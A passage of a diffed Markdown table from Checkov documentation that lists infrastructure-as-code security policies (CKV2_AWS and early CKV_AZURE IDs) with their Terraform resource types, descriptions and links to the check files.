[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1106 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1107 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1108 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1109 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1110 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1111 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1112 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1113 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1114 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1115 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1116 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1117 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1118 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1119 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1120 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1121 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1122 | CKV2_AWS_37 | resource 
| aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1123 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1124 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1125 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1126 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1127 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1128 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1129 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1130 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1131 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1132 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1133 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1134 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1135 | CKV2_AWS_37 | resource | 
aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1136 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1137 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1138 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1139 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1140 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1141 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1142 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1143 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1144 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1145 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1146 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1147 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1148 | CKV2_AWS_38 | resource | 
aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | +| 1149 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | +| 1150 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1151 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1152 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1153 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1154 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | 
[IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1155 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1156 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | +| 1157 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | +| 1158 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | +| 1159 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1160 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | 
[VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1161 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1162 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1163 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | +| 1164 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1165 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1166 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible 
resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | +| 1167 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | +| 1168 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | +| 1169 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1170 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1171 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1172 | CKV2_AWS_52 | resource | 
aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1173 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1174 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | +| 1175 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | +| 1176 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | +| 1177 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1178 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1179 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1180 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1181 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1182 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1183 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1184 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | +| 1185 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | +| 1186 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1187 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1188 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | +| 1189 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | +| 1190 | CKV2_AWS_62 | resource | 
aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | +| 1191 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | +| 1192 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | +| 1193 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | +| 1194 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | +| 1195 | CKV2_AWS_67 | resource | aws_kms_key | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1196 | CKV2_AWS_67 | resource | aws_s3_bucket | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1197 | CKV2_AWS_67 | resource | 
aws_s3_bucket_server_side_encryption_configuration | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1198 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1199 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1200 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1201 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1202 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | +| 1203 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | 
